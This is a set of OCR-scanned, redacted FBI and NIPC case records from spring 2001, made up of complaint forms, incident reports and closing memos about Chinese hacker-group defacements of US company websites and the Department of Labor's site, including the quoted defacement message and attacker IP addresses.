has the logs and “a has been able to by pass his firewall through the web site servers. 


ood Luck on another one. 


_ - 
& @ 


From: 

Sent: i : Thursday, May 17, 2001 10:12 AM 
To: ‘nccs-sf@fbi.gov' 

Subject: ; Ss 


This web page was placed on our MS exchange Web server. We believe that 
they entered from the port 80 service on our firewall and got to this 


server. They left behind Firedaemon.exe, sud.exe and newgina.dll. Our 
researched showed that they were capturing ID's and passwords. Then they 
left this message on the mail web server. The following is the html and a 


screen print. I did not want to take the chance that I might spread it even 
more. I£ you would like the original file I can send it. 


We are removing all traces _and heightening our security. If I help in any 


<html><body bgcolor=black><br><br><br><br><br><br><table width=100%3><td><p 
align="center"><font size=7 color=red>fuck USA Government</font><tr><td><p 
align="center"><font size=7 color=red>fuck PoizonBOx<tr><td><p 

align="center"><font size=4 color=red>contact:sysadmcn@yahoo.com.cn</html> 


<<...OLE_Obj...>> 


Color Spot Nurseries 
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fuck USA Government 
fuck PoizonBOx 


contact:sysadmcn@yahoo.com.cn 
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NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: CJ Negative [1 See below 


Subject's name and aliases Character of case 


UNSUB (S) ; Website Defacement 
Honker Union Of China 


Complainant [[] Protect Source 


b6 
b7c 


Complaint received 


CI Personal ([& Telephonic Date 05/14/2001 Time_10:45 A 


Address of Subject a address and telephone number 


Complainant's DOB 


Scars, marks and other data 


Employer Address Telephone 


Subject’s 
Description 


Vehicle Description 


Facts of Complaint 


Complainant advised that their website, www.caseassist.com, had 
been defaced by someone who posted a page that included the messages, 
“fuck USA government” and fuck “PoizonBOx”. A copy of the defaced page is 
attached to this FD-71. The website was replaced and operation was 
resumed. No damages are being claimed. Information being provided for 
reference. 


Complainant advised complaint will be forwarded to Chicago 
Division which is coordinating efforts on this matter. 


Do not write in this space. 
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fuck USA Government 
fuck PoizonBOx 


contact:sysadmen@yahoo.com.cn 


http://www.caseassist.com/ 5/10/01 
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NOTE: Hand print.y names legibly; handwriting satisfactory for remainder. 
Indices: Cc) Negative LJ See below 


Subject's name and aliases Character of case 


NIPCTIP 


Complainant ["] Protect Source 


b6 
Authorden.com bic 
Complaint received 
CJ Personal [I] Telephonic Date 5/14/01 Time. 
Address of Subject Complainant's address ~ telephone ma 
2 Whi Santa Clara CA 95051 
Sex 
n S 
3 2 Age our Social Security Number 
AQ | Scars, marks and other data 
‘| Employer Address Telephone 
Facts of Complaint 
On Friday, May 11, 2001, complainant discovered that his system. 
was compromised and his web page was defaced with anti-American comments 
(black background with red letters). The intruder was able to copy 4 
files into Authorden’s system: default.asp, default.htm, index.asp, and 
index.htm. 
The complainant proceeded to change the password and rebooted 
his system, but the intruder was back within one minute. Complainant 
repeated this process again, and the intruder did not re-connect until 
Monday (May 14, 2001). As a result of this, complainant had to shut his 
system down until 2:00PM. 
Complainant advised that his logs show the attacker came from 
IP address 202.104.4.217. The victim's Do not write in this space. 
IP is 64.226.241.24 (www.authorden.com) . 
Authorden server runs Windows 2000. 
Complainant advised that he has multiple 
logs, documenting the attack. 
Complainant was asked to maintain all 
logs, as well as a backup of the system, 
if possible, as evidence. 
b6 
SA : . b7c 


(Complaint received by) _ BLOCK STAMP 


13 HT preee 


“Complaiit Form @ & 
FD-71 (Rev. 3-27-95) " 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: i) Negative J See below 


Subject's name and aliases Character of case 


NIPCIP 


Complainant [] Protect Source 
b6 
b7Cc 


Complaint received 


CI Personal E&I) Telephonic Date 5/17/01 Time_2:45 PM 


Address of Subject Complainant's address and telephone number 
Siebel Svstems, Inc, San Mateo, CA 


Complainant's DOB 


Scars, marks and other data 


Subject’s 
Description 


Employer Address ; Telephone 


Vehicle Description 


Facts of Complaint 


On May 16, 2001, Sergeant San Mateo County b6 
Sheriff’s Office, contacted SA and advised that he received a b7C 
call from Siebel Systems, reporting a compromised computer 


system. Sergeant further advised that the attack consisted of a 
defaced web page i-American remarks (red. letter on a black 
background). SA agreed to contact the victim company the 
following day. 


| =i (w”s*~*é‘z(L Siebel «Systems, Inc., advised that on May 16, 2001, their help BiG 


desk received a call reporting that their web page was defaced. Upon 
examination, the company discovered that at approximately 3:32 PM, an 
individual replaced the “default” and “index” files. No other files were 
deleted or replaced. The company Do not write in this space. 
proceeded to take the server off-line. 


The compromised system, 
outlook.siebel.com, IP address 
216.217.80.44, was running Windows 2000, 


with IIS 5. [.____ ]advised that the b6 


system was not “to date” on the patches. | b7c 


SA 
omplaint received by BLOCK STAMP 


SSS 


b6 


is not aware of the originating IP address of the ee 


attacker, since he has not reviewed the logs. 


is not aware of the financial loss to date. 
However, as of the time of this report, the system was still 
down, pending the cleaning prior to bringing it back on-line. 
Consequently,[ J indicated that there was a financial loss. 


agreed to maintain copies of all logs and/or 
backups, and to provide them to the FBI upon request. 


Complaint Form ° ? & } ff ; 
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NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: x] Negative ia See below 


Subject's name and aliases Character of case 


UNSUB Computer Intrusion - /44/4& 


Complainant [7] Protect Source 
b7C 
Complaint received 


(FJ Personat [J] Telephonic Date O5/11/01 Time_9:00 am 


. Address of Subject Complainant's address and telephone number 


as 
; M 


Scars, marks and other data 


Subject’s 
Description 


Employer Address Telephone 
Facts of Complaint 
b6 
acking. @ Ltarst b7c 
incident occurred 7-8 weeks ago. Another incident occurred this morning, 
5/11/2001, effecting the company’s website, www.equator.com. 
| A message appeared on the website containing the phrase, “Fuck the US 
Government.” It also contained a contact email address of 
| cysodmen@yahoo.com.cn. [__]interpreted the “cn” to reflect the message 
| as coming from China. 
| 
Do not write in this space. 
b6 
b7C 
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NOTE: Hand print names legibly; handwriting satisfactory for remainder. 
Indices: [I Negative [J See below 


Subject's name and aliases Character of case 


UNSUB Computer Intrusion 


Complainant [_] Protect Source 


Complaint received 


[J Personal [J Telephonic Date.O5/11/ Or Time_L:15 pm 


Address of Subject Complainant's address and telephone number 


50 California Street, SF, CA 


— 
M 


Scars, marks and other data 


Address Telephone 


Subject’s 
Description 


Vehicle Description 


Facts of Complaint 


for USI Insurance Services, Inc., 
reported an incident of computer intrusion that occurred today, 5/11/01. 
believes the hacker accessed the company’s website, www.usi- 

insurance.com via a “hole” or flaw in Microsoft’s security software. A 
message appeared on the company’s website containing the phrase “Fuck the 
US Government.” 

orks for the company in Connecticut, however the company 
is based out of San Francisco. He provided _ the names and numbers of 


oe that can be contacted locally: [aan 


Do not write in this space. 
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FBI FACSIMILE 
COVER SHEET 
PRECEDENCE CLASSIFICATION 
[X} Immediate [) Top Secret Time Transmitted: : 
) Priority CL) Secret Sender's Initials: | oe 
[J Routine CO Confidential Number of Pages: @ 
C] Sensitive (including cover sheet) 
PL Unclassified 
To: San Fransisco Field Office Date: 05/25/01 
Name of Office 
Facsimile Number: _(415) 553-7674. 
b6 
Attn: SSA (415) 553-7400 — 
‘Name Room Telephone 


From: _NIPC Watch and Warning Unit 


Name of Office 


Subject: Web Site Defacement 


Special Handling Instructions: 


Originator's Name: secf Telephone: 202-323-3205 =) 


Originator's Facsimile Number: 202-323-2079 


Approved: 


Brief Description of Communication Faxed: 


WARNING 


Information attached to the cover sheet is U.S. Government Property. If you are not the intended recipient of this 
information, disclosure, reproduction, distribution, or use of this information is prohibited (18.USC, § 641), Please notify the 
originator or the local FBI Office immediately to arrange for proper disposition. 


MAY.15.2881 " 5:28AM 


a oO a sg WF 3@ 
z Forderded - ssal_ | 


. 06/14/2000 
Ene (San Fomsisco FO) 415 ~SS3- 76H 
National Infrastructure Protection Center 


Cyber Threat and Computer Intrusion 
Incident Reporting Guidelines — 


This form may be used as a guide or vehicle for reporting cyber threat and computer intrusion incident 
information to the NIPC or other Jaw enforcement organization. It is recommended that these Cpber 
Incident Reporting Guidelines be used when submitting a report to a local FBI Field Office. 


Do NOT include CLASSIFIED information on this form unless you adhere to applicable procedures for 
proper marking, handling aud transmission of classified information. ‘Please contact NIPC Watch 
Operations Center (202) 323-3205 to arrange secure means to submit classified information. 


Information conceming the identity of the repotting agency, department, corppany, or individual(s) will be 
* treated on a confidential basis. If additional mformation is required, you will be contacted directly. 


Report Date/Time: M gf, Ip Pf] 


When completed, fax to NIPC WWU (202) 323-2079/2082. 


AtRAa eo s ; 
ets ry Tet RTA AAT RR NDS oacate rae oar ratte ne mE 
‘ RU h NEADS a ot nat at 7 
parrot au peels dy A Reo 


Name: 


, HEALTHHIGHWAY «COM 


Title: 

Telephone/Fax number: 68 — 4-7 32-3 CFAK) 
E-mail: 

Organization: a 


Address: Street lus S, PARE  VieroR, a D2 
City, State, Zip Code MILDLTAS Ch GFFZO038E 


Country \ S ‘ . 


Guerra 


b7c 


2 ; . AUER TTL Lory Ns va ee Wee Sen IES ee 
OSpn aaa ae Nis ve rae Aut ae ne PTR emer aint 
H Nae Rus aa ON, i abe Veta BENS 

oe see : ah coe 15s ao Geraint fe | Se Be He, ESE a SE is a tie ae 


Incident Information 


Name of organization: (if same as above, enter “SAME”) 


f (Check here if Federal Government Agency) 
Organization's contact information: 
Telephone number: 
Address: (if same as above, enter “SAME”) 
Street 
City, State, Zip Code 
Country 


E-mail: Sa Race a ET 


: : oe «1 VARIO 
Physical Location(s) of victim's ¢ ter systen/network (Be Specific): 
ysic on(s) of victim's computer sy js] 2 PRELL, of 


Eis / D 
Date/time and duration of incident: 5 


I the affected system/network criti¢a) to the organization's mission? 
Kes q No 


Critical infrastructure sector(s) affected, (Check all that apply) 
Power 0 Transportation 
Banking and Finance Emergency Setvices 
Goverment Operations ; Water Supply Systems 
Gas & Oil Storage and Delivery Gther (Provide details in remarks) 
Telecommumications ] Not applicable 

Remarks: 


i a 


MAY. 15.2001 * 5:28AM 


10, 
11. 


-Nature of Problem? (Check all that apply) 


“4 Intrusion n System impairment/denial of resources 
0 Unauthorized root access SA Web arite defacement 

Q Compromise of system integrity 0 Hoax 

0 Theft D Damage 

n Unknown n Other (Provide details in remarks) 


Has this problem been experienced before? (If yes, please explain in remarks soction): 


0 Yes XK No 

Remarks: 

Suspected method of intrusion/attack 

M Virus (provide name if known) [ls Wullnerabiity exploited (explain) 
n Donial of Service n Trojan horse 

n Distributed Denial of Service q Trapdoor 

RK Unknown 0 Other (Provide details in remarks) 
Remarks: 


Suspected perpetrator(s) or possible motivation(s) of the attack 


rm Insider / Disgruntled employee n Former employee 

= Competitor Other Explain in remarks) 
>. Unknown. 

Remarks; 


The apparent source (IP address) of the intrusion/attack: 


Evidence of spoofing? 
n Yes n No 
> S Unknown, 


Oe 


3:29AM 


12. _ What computers/systems (hardware and software) were affected? (Operating system, version): 
n Unix n os2 
Q Linux it VAX/VMS 
NT “Windows 
Sun OS/Solaris O . Other (Please specify in remarks) 


13. Security Infrastructure in place. (Check all that apply) 
Incident/Emergency Response Team =] Encryption 
Firewall 3 Secure Remote Access/Authorization 
Intrusion Detection System tools 
Security Auditing Tools Banners 
Packet filtering Access Control Lists 


14. - Did the intrusion/attack result in a loss/compromise of sensitive, classified or proprietary . 
information? 

0 —-Yes (Provide details in remarks} X{  ——-No 

0 Unknown 

Remarks: 


Did the intrusjon/attack result in damage to system(s) or data? 
O Yes (Provide details in remarks) SK No 
Remarks: 


What actions and technical mitigation have been taken? 
System(s) disconnected from the a System Binaries checked 
network? 0 Other (Please provide details in 
Baclap of affected system(s) remarks) 
Log files examined No action(s) taken 


17. 


18. 


19. 


20. 


21. 


22, 


5:29AM —— NO. 735 


ra 


Has the,local FBI field office been informed? 
M1 —-Yes (Which office) RK No 


Has another agency/orgenization been informed? If so, please provide name and phone number. 


x Yes <i No | 


= State/local police 
« Inspector General. 


° CERT-CC 
. FedCIRC 
« JTF-CND Es 


od 


e Other (Incident Response, law enforcement, etc.) 


_ When was the last time your system was modified or updated? 


Date: ) 

Company/Organization that did work (Address, phone, POC information); = 
AGRO CoM AUT NG Yonk- Y4/~ /YPOd 

Is the Syatem Administrator a contractor? , 

0 —-Yes (Provide POC information BH ONo 


In addition to being used for law enforcement or national security purposes the intrusion-related 
information I have reported may be shared with: 
D The Public 
XH _—sinfraGard Members with Secure Access = 
Additional Remarks: (Please limit to 500 characters. Amplifying information may be submitted 
separately.) TN UeANity, NET WEB OTE. AAG PAM 


DM REX - nePALe TO ATA paces WITH fu7l US, GOVT, 


Sa 


F 0 Gt 
If the repotted incident is determined to be a criminal matter you may be ‘seiner ty an agent for 
additional information. 


-S- 


P.6 


. ED-71, (Rev. 3-27-95) 
Complaint Form 


NOTE: Hand print names legibly; handwriting satisfactory for remainder. 


Indices: x Negative [_] See below 


Subject's name and aliases 


UNSUB 


Address of Subject 


Subject’s 
Description 


Scars; marks‘ahd other data’ < 


Employer 


Vehicle Description 


Facts of Complaint 


Complainant 
(NHFO) on 04/28/20 
States Department of Labor 


Character of case, 


Computer Website Hack 
U.S. Department of Labor Web Site 
264 = 


=e | are Source 


Referred by FBI New Haven Division 


Complaint received 


O Personal 


Date 04/28/2001 Time 10:15 a 


_=— 


Telephonic 


Complainant's address and telephone number 


Complainant's DOB Sex 
: : Female 


Address Telephone 


contacted the FBI New Haven Field Office 
reported a computer hack of the United 
LL) website located at WWW.DOL.GOV. ‘The 


website has been altered to display a memorial for the downed Chinese 


fighter pilot, Wang Wei. The 


complaint to WFO. NHFO CART SA 


website displays the following_me : 
"China Hack, China Tianyu, now is here and salute a flag". ce 


of the FBI NHFO 2 
[ confirmed the DO 

to the USDOL website administrative point of conta 
contact 


and technical...point—o 


hack. reported the incident 


BLOCK STAMP 
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From: 

To: 

Sent: Tuesday, May 29, 2001 8:59 AM 
Subject: FW: Incident Report 

David, 


Here is a copy of the incident report filled with FedCIRC regarding the web 


page defacement of u have any additional questions, 
please give me a call at 


Thanks 
Department of Labor 


From: 

Sent: Saturday, April 28, 2001 7:25 PM 
To: 'fedcirc@fedcirc.gov' 

Ce 

Subject: Incident Report 


Federal Computer Incident Response Center 

(FedCIR€) : 

Incident Reporting Form 

Your contact information 

name: 

email address: 

telephone number: 

other: N/A . 

Affected Machine(s): Microsoft Internet Information Server (IS), call 
contact personnel for more descriptive information. 

hostname and IP.: ISFPBO1, call contact personnel for specific IP address. 
timezone: EST 


Source(s) of the Attack: Beijing China 
hostname or IP: 211.100.10.166 
timezone: GMT +08:00 

been in contact?: No 


. Description of the incident: 


Web page defacement occurred 


is the defacement of the web page for www.dol.gov. The web page was 
restored from backup. No mission impact or loss of critical services. Cost 
to restore the web page from backup was insignificant. 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/05/2001 
To: Counterterrorism Attn: NIPC-CIU (Rm 5965 
bé 
From: Washington Field b7C 
NS-18/NVRA bE 


Contact: SA (703) 762-3155 


Approved By: 


Drafted By: 

Title: Subject: UNSUB (S) ; 
Victim: VEHICLE CONTROL TECHNOLOGIES, INC.; 
Type: INTRUSION - INFO SYSTEMS 
Date: ' 05/06/2001 


b7E 


SUBMISSION: [1 Initial O Supplemental X Closed 
CASE OPENED: 


CASE CLOSED: 

(1) No action due to state/local prosecution (Name/Number ) 
XO USA declination 

L] Referred to Another Federal Agency (Name/Number: ) 
X Placed in unaddressed work 

O Closed administratively 

CO Conviction 


COORDINATION: FBI Field Office 
Government Agency 
Private Corporation 


VICTIM 


Company name/Government agency: VEHICLE CONTROL TECHNOLOGIES, INC. 


Address/location: 11180 SUNRISE VALLEY DRIVE, SUITE 350 
RESTON, VIRGINIA 20191 


b7Cc 


Purpose of System: Web Server 


To: Counterterrorism From: Washington Field 


Highest classification of information stored in system: None 


System Data: 
Hardware/configuration (CPU): DELL DIMENSION, PII 550 MHz 
Operating System: MICROSOFT WINDOWS 2000 SERVER, SP1 
Software: MICROSOFT EXCHANGE, MICROSOFT IIS v5 


Security Features: 
Security Software Installed: X yes O no 
Logon Warning Banner: xX yes CL) no 


INTRUSION INFORMATION 
Access for intrusion: X Internet connection 01 dial-up number 11 LAN (insider) 
Internet address: 207.251.169.226 


Network name: 


Method: 
Technique(s) used in intrusion: Exploited IS vulnerability 


Path of intrusion: 


addresses: 1. 2. 2. 4. 5 
country: 1. as 3 4. > 
facility: 1. 2s 3. 4. 5. 
Subject: 
Age: Race: 
Sex: Education: 
Alias(s): Motive: 
Group Affiliation: 
Employer: 
Known Accomplices: 
Equipment used: 
Hardware/configuration (CPU): 
Operating System: 
Software: 
Impact: 


Compromise of classified information: 1 yes X no 
Estimated number of computers affected: 1 
Estimated dollar loss to date: Estimated at $1,000. 
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To: _Counterterrorism From: Washington Field 
res[ dS, 06/05/2001 bs 
b7E 


Category of Crime: 
Impairment: Theft of Information: 
X Malicious code inserted CL] Classified information compromised 
[] Denial of service . ©) Unclassified information compromised 
C) Destruction of information/software CO Passwords obtained 


O Modification of information/software | [] Computer processing time obtained 
[1 Telephone services obtained 
[] Application software obtained 
LC] Operating software obtained 
Intrusion: 
X Unauthorized access 
O Exceeding authorized access 


REMARKS 


On June 05, 2001, sAL__——contactea[ | b6 


Engineer, Vehicle Control Technologies, Incorporated, Bic 


11180 Sunrise Valley , Reston, Virginia 20191, 
work telephone number regarding to a NIPC Report 
filed by him on May_08, 2001. After being advised of the 
interviewing agent,[ voluntarily provided the following 
information: 

On May 06, 2001,[ _|discovered that his web pages 
were defaced and replaced wi a defaced web page regarding to 


anti USA Government and PoizonBox statements. Additionally, an 
email address of sysadmcn@yahoo.com.cn was provided as a point of 
contact on the defaced web page. 


Further analysis revealed that a script was placed on 
Vehicle Control Technologies, Inc.'s web server which allowed the 
intruder(s) to gain root access. Once root access was obtained, 
the intruder(s) deleted all HTML files and replaced installed a 
defaced web page on the aforementioned web server. 


The IP address for which the aforementioned script and 
defaced web page originated from was 161.116.199.15 was 
determined to be the source for which the defaced web page was 
installed. The aforementioned IP address resolves to a computer 
system located at the University of Barcelona, Spain. 


For reference purposes, one (1) copy of the related 


To: Counterterrorism From: Washington Field 

Re: , 06/05/2001 b3 
b7E 

email is attached to this document. 
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b7c 
on dee 

To: <nipc.watch@fbi.gov> 


Sent: Tuesday, May 08, 2001 5:32 PM 

Subject: Cyber Incident Report Form 

Report ime=5/8/01 17:29 EDT 

Name - 


Title=Engineer 


Telephone Fax Number 
Email 
Organization=Vehicle Control Technologies, Inc. 


Addrs_Street=11180 Sunrise Valley Drive, Suite #350 

City=Reston 

State=VA 

Zip Code=20191 

Country= 

Questioni_Organization=SAME 

Question1_Contact_Info= 

Question1_Tele_Number= 

Question1_Street=SAME 

Question1_City_-State_Zipcd= 

Question1_Country= 

Question1_Email= 

Question2_Location=Vehicle Control Technologies offices located at 11180 
Sunrise Valley Drive, Suite 350, Reston, VA 20191. 
Question3_Date_Time=5/6/01 17:13 EDT 
Question4_Critical=No 

Question5_Remarks=No Remarks 
Question6_nature_of_prob=Intrusion 
Question6_nature_of_prob=Unauthorized root access 
Question6_nature_-of_prob=Web site defacement 
Question6_other= 

Question7_exp_problem=No 
Question7_Remarks=No Remarks 
Question8_method_of_attack=Vulnerability exploited 

* Question8_Remarks=IIS 5.0 running on Windows 2000 server without latest 
security patches. 

Question9_sus_perpetrators=Other 
Question9_Remarks=Suspect Chinese attack, reference to 
"contact:sysadmcn@yahoo.com.cn 

"on the defaced web page. 
Question10_ip_addrs=161.116.199.15 } sevees 1¢ b7E 
Question11_evid_of_spoof=No 
Question12_oper_systems=Windows 
Question12_Remarks=Windows 2000 Server SP1 
Question13_security_infrasture=Encryption 
Question13_security_infrasture=Firewall 
Question13_security_infrasture=Secure Remote Access/Authorization tools 
Question13_security_infrasture=Access Control Lists 
Question13_security_infrasture=Packet filtering 


Page 2 of 2 


~ @ eS 
nor @ 


Question14_attack_loss_info=No . 
Question14_Remarks=Sensitive, classifed and proprietary information is 
not authorized nor kept on this server. 
Question15 damage_systms=Yes . 

Question15 Remarks=Minor defacement to web pages. 
Question16_what_actions=System(s) disconnected from the network 
Question16_what_actions=System Binaries checked 
Question16_what_actions=Backup of affected system(s) 
Questioni16_what_actions=Log files examined 
Questioni6_Remarks=No Remarks 

Question17_Field Office= 

Question17_fieldoff_inform=No 

Questioni8_agency_inform=Yes 

Question18 State_local Police= 

Question18_Inspector General= 

Question18_CERT-CC=submitted on-line incident form 
Question18_FedCiRC= 

Question18_JTF-CND= 

Questioni8 Other= 

Question19_date_of_last_update=??? 
Question19_org_-work_update=Vehicle Control Technologies, Inc. (we manage 
our own server) ‘ 

Question20_POC Information= 

Question20_sys_adm_contract=No 

Share Info With=Infrastructure Orgs 

Question21_remarks=Defaced web page included the following text: 


fuck USA Government 
fuck PoizonBOx 


contact:sysadmcn@yahoo.com.cn 


5/9/01 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/05/2001 


To: Counterterrorism Attn: Computer Investigations 
Unit, NIPC, Room 5965 


From: Washington Field Office / NVRA 
Squad NS-18 
Contact: SA (703) 762-3054 
Approved By: b7E 


Drafted By: 


Gage ID #: (Pending) 
(Pending) 


Title: Subject: UNSUB (S) 


Victim: AMERICAN MANAGEMENT SYSTEMS; 
Type: INTRUSION - INFO SYSTEMS 
Date: 05/05/2001 


i i 
b7E 


SUBMISSION: UO Initial O Supplemental X Closed 
CASE OPENED: 


CASE CLOSED: 


QO No action due to state/local prosecution (Name/Number ) 
C1 USA declination 


C] Referred to Another Federal Agency (Name/Number: ) 


X Placed in unaddressed work 
QO Closed administratively 


- 0 Conviction 


COORDINATION: FBI Field Office 
Government Agency 
Private Corporation 


To: Counterterrorism From: Washington Field Office / NVRA 
b7E 


VICTIM 


Company name/Government agency: AMERICAN MANAGEMENT SYSTEMS 
Address/location: 4000 Legato Road 
Fairfax, Virginia 22033 


Purpose of System: 
Highest classification of information stored in system: Unclassified 


System Data: 
Hardware/configuration (CPU): 
Operating System: Microsoft Windows NT 4.0 
Software: IS 4.0 


Security Features: unknown at this time 
Security Software Installed: 0 yes O no 
Logon Warning Banner: O yes OO no 


INTRUSION INFORMATION 


Access for intrusion: X Internet connection 0) dial-up number 0 LAN (insider) 
If Internet: Internet address: 202.39.129.10(subject) 
208.247.58.xxx(victim subnet) 
Network name: 


Method: 
Technique(s) used in intrusion: sadmind/IS Worm (Cert Advisory CA-2001-11) 


Path of intrusion: 


addresses: 1. 2 3 4, 5. 
country: 1. 2. 2: 4. 3: 
facility: 1. 2 3: 4. Si 
Subject: 
Age: Race: 
Sex: Education: 
Alias(s): Motive: 
Group Affiliation: 
Employer: 


Known Accomplices: 


TOs From: Washington Field Office / NVRA 
Re; b3 
b7E 


Equipment used: 
Hardware/configuration (CPU): 
Operating System: 
Software: 


Impact: 
Compromise of classified information: O yes X no 
Estimated number of computers affected: Five (5) 
Estimated dollar loss to date: Approximately 10-15K 


To: Counterterrorism From: Washington Field Office / NVRA 
Re: 


Category of Crime: 


Impairment: Theft of Information: 
CO Malicious code inserted O1 Classified information compromised 
(C] Denial of service O Unclassified information compromised 
O Destruction of information/software O Passwords obtained 


X Modification of information/software | [1 Computer processing time obtained 
(1 Telephone services obtained 
CL) Application software obtained 
C] Operating software obtained 
Intrusion: 
1 Unauthorized access 
C) Exceeding authorized access 


REMARKS 


POY etc mawczmen 


ixrdinia 22033, telephone number 
AMERICAN MANAGEMENT SYSTEMS 


eee ae Road, Fairfax, Virginia 22033, telephone number[ ____| 


were contacted reference a web page defacement which occurred 
on May 5, 2001. 


advised that AMERICAN MANAGEMENT SYSTEMS (AMS), a 
company with approximately 8500 employees, had been the victim of a 
web page defacement. AMS has been a victim of a Chinese web page 
defacement five (5) times, all against different systems. Four (4) 
of the five (5) servers attacked are of little importance to AMS as 
they are test-type servers. However, one of the servers is described 
as a meeting-type server that houses a web page that the employees of 
AMS use to schedule meetings, conferences, etc. The web page was 
deleted from AMS and replaced by the "Honkers" web page. 


advised that servers did not have any security 
software installed on them, but that they do use Checkpoint 
firewalls. 
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From: NIPC-WATCH 


To: 
Date: Wed, May 9, 2001 3:16 AM 
Subject: Cyber Intrusion Report 050901 017 41577 


The Watch received the following report: 


Subject: Cyber Incident Report Form 
Date: Tue, 8 May 2001 15:15:43 -0400 
From: 

To: <nipc.waich@fbi.gov> 


Report_date_time=5/8/2001 3:00pm EDT 


Organization=American Management Systems 
Addrs_Street=4000 Legato Rd. 

City=Fairfax 

State=VA 

Zip Code=22033 

Country=USA 

Question1_Organization=SAME 
Question1_Contact_Info= 
Question1_Tele_Number= 

Questioni_Street=SAME 
Question1_City_State_Zipcd= 

Question1_Country= 

Questioni_Email= 

Question2_Location=4050 Legato Rd. 

Fairfax, VA 22033 

Question3_Date_Time=5/5/2001 8:39am EDT 
Question4_Critical=No 
Question5_crit_infrasture=Not Applicable 

QuestionS5 Remarks=No Remarks 
Question6_nature_of_prob=Intrusion 
Question6_nature_of_prob=Web site defacement 
Question6_nature_of_prob=Compromise of system integrity 
Question6_nature_of_prob=Damage 
Question6_other= 

Question7_exp_problem=No 
Question7_Remarks=No Remarks 
Question8_method_of_attack=Vulnerability exploited 
Question8_Remarks=sadmind/IIS Worm 

(Cert Advisory CA-2001-11) 
Question9_sus_perpetrators=Other 
Question9_Remarks=US-Chinese hacking wars 
Question10_ip_addrs=202.39.129.10 
Question11_evid_of_spoof=No 
Questioni2_oper_systems=NT 
Questioni2_Remarks=Microsoft Windows NT 4.0 

IIS 4.0 
Question13_security_infrasture=Incident/Emergency Response Team 
Question13_security_infrasture=Firewall 
Question13_security_infrasture=Intrusion Detection System 
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eupstionl4_ attack_loss_info=No 
Questioni4_Remarks=No Remarks 
Questioni5_damage_systms=Yes 


orn. security_infrasture=Security Auditng Tools 


Question15_Remarks=Various NT executables and services were corrupted. 
Question16_what_actions=System(s) disconnected from the network 
Question16_what_actions=Backup of affected system(s) 


Question16_what_actions=Log files examined 
Question16_Remarks=No Remarks 
Question17_Field Office= 
Question17_fieldoff_inform=No 
Question18_agency_inform=No 
Question18_State_local Police= 
Question18_Inspector General= 
Question18_CERT-CC= 

Question18_ FedCIRC= 
Question18_JTF-CND= 

Question18_Other= 
Question19_date_of_last_update=unknown 
Question19_org_work_update= 
Question20_POC Information= 
Question20_sys_adm_contract=No 

Share Info With=Infrastructure Orgs 
Question21_remarks=No additional remarks 


ss 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/06/2001 


To: Counterterrorism Attn: Computer Investigations 
Unit, NIPC, Room 5965 


From: Washington Field Office / NVRA 
Squad NS-18 
Contact: SA (703) 762-3054 
Approved By: b7E 


Drafted By: 


Case ID #: (Pending) 
Pending) 


Title: Subject: UNSUB (S) 


Victim: ASSOCIATION OF TRIAL LAWYERS OF AMERICA; 
Type: INTRUSION - INFO SYSTEMS 
Date: 05/06/2001 


b3 
Reference: b7E 


SUBMISSION: UO Initial O Supplemental X Closed 
CASE OPENED: 


CASE CLOSED: 


C] No action due to state/local prosecution (Name/Number ) 
O USA declination 


QO) Referred to Another Federal Agency (Name/Number: ) 
X Placed in unaddressed work 

C Closed administratively 

O Conviction 


COORDINATION: FBI Field Office 
Government Agency 
Private Corporation 


To: Counterterrorism From: Washington Field Office / NVRA 


bTE 


VICTIM 


Company name/Government agency: ASSOCIATION OF TRIAL LAWYERS OF AMERICA 
Address/location: 1050 31st Street, NW 
Washington, DC 20007 


Purpose of System: 
Highest classification of information stored in system: Unclassified 


System Data: 
Hardware/configuration (CPU): 
Operating System: Microsoft Windows NT 4.0 
Software: 


Security Features: unknown at this time 
Security Software Installed: O yes X no 
Logon Warning Banner: CO yes X no 


INTRUSION INFORMATION 
Access for intrusion: X Internet connection 01 dial-up number 11 LAN (insider) 
If Internet: Internet address: 


Network name: 


Method: 
Technique(s) used in intrusion: 


Path of intrusion: 


addresses: 1. 2, 3. 4. 5. 

country: 1. 2: 3. 4. a: 

facility: 1. zs 3. 4. 5. 
Subject: 

Age: Race: 

Sex: Education: 

Alias(s): Motive: 

Group Affiliation: 

Employer: 

Known Accomplices: 


Equipment used: 


To: pe Washington Field Office / NVRA a 
Re: 
b7E 


Hardware/configuration (CPU): 
Operating System: 
Software: | 


Impact: 
Compromise of classified information: O yes X no 
Estimated number of computers affected: One (1) 
Estimated dollar loss to date: 


le ; © @ 


To: Counterterrorism From: Washington Field Office / NVRA 
Re: 


Category of Crime: 
Impairment: Theft of Information: 
[ Malicious code inserted QO Classified information compromised 
C] Denial of service C1 Unclassified information compromised 
O Destruction of information/software O Passwords obtained 


X Modification of information/software [1 Computer processing time obtained 
O Telephone services obtained 
O Application software obtained 
O Operating software obtained 
Intrusion: 
O Unauthorized access 
O Exceeding authorized access 


REMARKS 


ASSOCIATION OF TRIAL LAWYERS OF AMERICA, 1050 3ist Street, NW, 


Washington, DC 20007, telephone nber (oS was contacted 
reference a web page defacement which occurred on May 6, 2001. 


advised that the ASSOCIATION OF TRIAL LAWYERS OF 
AMERICA (ATLA), an organization that provided research and materials 
to purchase for its members, had been the victim of a web page 
defacement. This is a research-based web site, which provides income 
to ATLA. The web page was deleted from ATLA'’s site and replaced by 
"Honkers" web pages. 


advised that the FTP port on their web servers IP 
address, 206.5.234.109, was left open and[ believes that this 
is how the "HONKERS" group gained their access. The FTP service has 
Since been stopped. 
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"Cyber Intrusion Repogms0901 00741565 


From: NIPC-WATCH 

To: . 

Date: Wed, May.9, 2001 2:11 AM 

Subject: - Cyber Intrusion Report 050901 007 41565 


The Watch received the following report: 


Subject: Cyber Incident Report Form ~ 
Date: Tue, 08 May 2001 13:51:55 -0400 

From 

To: nipc.watch@fbi.gov 


8, 2001 - 1:40 pm 


Organization=Association of Trial Lawyers of America 
Addrs_Street=1050 31st Street, NW 

City=Washington 

State=DC 

Zip Code=20007 

Country=USA 

Questioni_Organization=Same 
Question1_Contact_Info=Same 

Question1_Tele_Number= 

Question1_Street=Same 

Question1_City_State_Zipcd= 

Question1_Country= 

Question1_Email= 

Question2_Location=In ATLA headquarters at address above. 
